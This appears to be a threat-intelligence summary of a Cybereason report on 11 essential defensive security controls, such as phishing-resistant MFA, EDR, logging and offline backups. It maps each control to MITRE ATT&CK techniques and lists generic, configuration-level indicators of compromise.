Based on frontline intelligence from over 7,000 incident investigations, Cybereason and partners identified 11 Essential Cybersecurity Controls that most effectively reduce likelihood, dwell time, and impact of attacks while enabling faster incident response and recovery. The guidance highlights common implementation pitfalls, DFIR-specific benefits, and mappings to major compliance frameworks to help organizations prioritize high-impact defenses. #PhishingResistantMFA #EndpointDetectionAndResponse
Keypoints
- The report distills lessons from 7,000+ incident investigations into 11 prioritized controls shown to materially reduce incident impact and speed response.
- Phishing-resistant MFA, EDR deployment, and Privileged Access Management are emphasized as top controls to block initial access and limit lateral movement.
- Centralized logging, asset inventory, and network segmentation are critical for visibility, accurate scoping, and containment during investigations.
- Regular patching, email security/filtering, and data classification address frequent attacker entry points and help protect high-value data.
- Incident response planning with tabletop exercises and tested, offline backups with RTO validation improve preparedness and recovery capabilities.
- The guidance highlights common pitfalls (e.g., incomplete EDR coverage, weak MFA, untested backups, siloed inventories) that reduce control effectiveness.
- Each control includes DFIR impacts and mappings to CIS, NIST CSF, and NIST 800-171 to align technical measures with compliance and risk management.
MITRE Techniques
- [T1110] Brute Force / Credential Access – MFA and phishing-resistant MFA were recommended because attackers routinely gain access through compromised credentials; “attackers routinely gain access through compromised credentials or easily bypass traditional MFA using common phishing kits.”
- [T1078] Valid Accounts – Presence or absence of MFA and PAM affects attacker ability to use valid accounts for lateral movement: “When MFA is weak or missing, lateral movement is easier, privilege escalation is faster, and the blast radius of successful compromises is broader.”
- [T1059] Command and Scripting Interpreter (PowerShell) – Centralized logging must include PowerShell and authentication events because missing logs hinder investigations: “Critical logs (like PowerShell, authentication events, or cloud admin actions) are often missing.”
- [T1210] Exploitation of Remote Services / Public-Facing Application Exploit – Regular patching and vulnerability management reduce initial access via exploited CVEs: “Exploited vulnerabilities consistently appear in the top three initial access methods.”
- [T1566] Phishing – Email security filtering and DMARC/SPF/DKIM enforcement are required because phishing is the top initial intrusion vector: “Phishing and social engineering are the top initial intrusion vector… accounting for 46% of intrusions during H1 2025.”
- [T1071] Application Layer Protocol (Exfiltration/Command and Control) – Centralized logging and EDR visibility help detect and trace attacker behaviors and data exfiltration activities: “EDR is often our fastest path to understanding attacker behavior across a networked environment… Centralized logs are our investigation backbone.”
- [T1486] Data Encrypted for Impact (Ransomware) – Offline, immutable, tested backups mitigate ransomware impact and support recovery when backups would otherwise be encrypted: “We frequently see cases where recovery is delayed or impossible because backups were encrypted or deleted by the attacker.”
Indicators of Compromise
- [Log Events] investigation context – PowerShell logs, authentication events, and cloud admin actions are highlighted as critical logs to collect (e.g., PowerShell execution records, failed authentication attempts).
- [Configuration Settings] security control context – DMARC/SPF/DKIM settings and MFA configuration types (e.g., FIDO2 vs. SMS-based MFA) are cited as security-relevant indicators (example: missing DMARC enforcement, SMS-based MFA enabled).
- [Asset Records] discovery context – Asset inventory entries and unmanaged devices (e.g., legacy endpoints, cloud VMs) are called out as common blind spots (example: unknown cloud VM, unmanaged workstation).
- [Backup State] recovery context – Backup accessibility and immutability status are listed as forensic/recovery indicators (example: backups accessible from production network, backups not immutable or untested).
Read more: https://www.cybereason.com/blog/11-essential-controls